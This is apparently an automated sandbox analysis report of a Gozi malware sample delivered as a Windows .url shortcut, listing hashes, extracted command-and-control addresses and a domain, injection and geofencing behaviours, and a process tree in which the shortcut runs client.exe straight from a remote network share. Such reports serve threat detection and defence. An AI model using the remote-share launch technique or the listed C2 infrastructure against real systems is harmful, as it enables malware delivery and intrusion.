Analysis
- max time kernel: 142s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-20230915-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-10-2023 13:24
Static task: static1
Behavioral task: behavioral1
- Sample: Informazioni.url
- Resource: win7-20230831-en
- Platform: windows7-x64
- 1 signatures
- 150 seconds
General
- Target: Informazioni.url
- Size: 192B
- MD5: c6c6f5a3d3e0444820d2865c7f1a07bc
- SHA1: 5f9c9620e315b09802e8e532f48195a9e60f2d2c
- SHA256: 59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f
- SHA512: 4a1a66efff8336bbde327c9256e6e473193c901bc47d1b7648bbfa29212490f3f47092ba060c47cc77a1e6952f6bf814346045d2d1c1eef556ba07d08f69c628
Malware Config
Extracted
- Family: gozi
Extracted
- Family: gozi
- Botnet: 5050
- C2: 185.247.184.139, 62.72.33.155, incontroler.com
- Attributes:
  - base_path: /jerry/
  - build: 250260
  - exe_type: loader
  - extension: .bob
  - server_id: 50
  - rsa_pubkey.plain
  - aes.plain
Signatures
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes: rundll32.exe
  description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation | process: rundll32.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Program crash (1 IoCs)
  Processes: WerFault.exe
  pid: 4860 | pid_target: 1072 | process: WerFault.exe | target process: client.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: rundll32.exe
  description: PID 3968 wrote to memory of 1072 | pid: 3968 | process: rundll32.exe | target process: client.exe
  description: PID 3968 wrote to memory of 1072 | pid: 3968 | process: rundll32.exe | target process: client.exe
  description: PID 3968 wrote to memory of 1072 | pid: 3968 | process: rundll32.exe | target process: client.exe
Processes
- C:\Windows\System32\rundll32.exe
  Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Informazioni.url
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - \??\UNC\62.173.146.46\scarica\client.exe
    Command line: "\\62.173.146.46\scarica\client.exe"
    - C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1072 -s 576
      - Program crash
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1072 -ip 1072
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- memory/1072-1-0x0000000002410000-0x0000000002510000-memory.dmp (Filesize: 1024KB)
- memory/1072-2-0x0000000003FD0000-0x0000000003FDB000-memory.dmp (Filesize: 44KB)
- memory/1072-3-0x0000000000400000-0x0000000002290000-memory.dmp (Filesize: 30.6MB)
- memory/1072-4-0x0000000004030000-0x000000000403D000-memory.dmp (Filesize: 52KB)
- memory/1072-7-0x0000000000400000-0x0000000002290000-memory.dmp (Filesize: 30.6MB)
- memory/1072-8-0x0000000002410000-0x0000000002510000-memory.dmp (Filesize: 1024KB)
- memory/1072-9-0x0000000003FD0000-0x0000000003FDB000-memory.dmp (Filesize: 44KB)
- memory/1072-13-0x0000000000400000-0x0000000002290000-memory.dmp (Filesize: 30.6MB)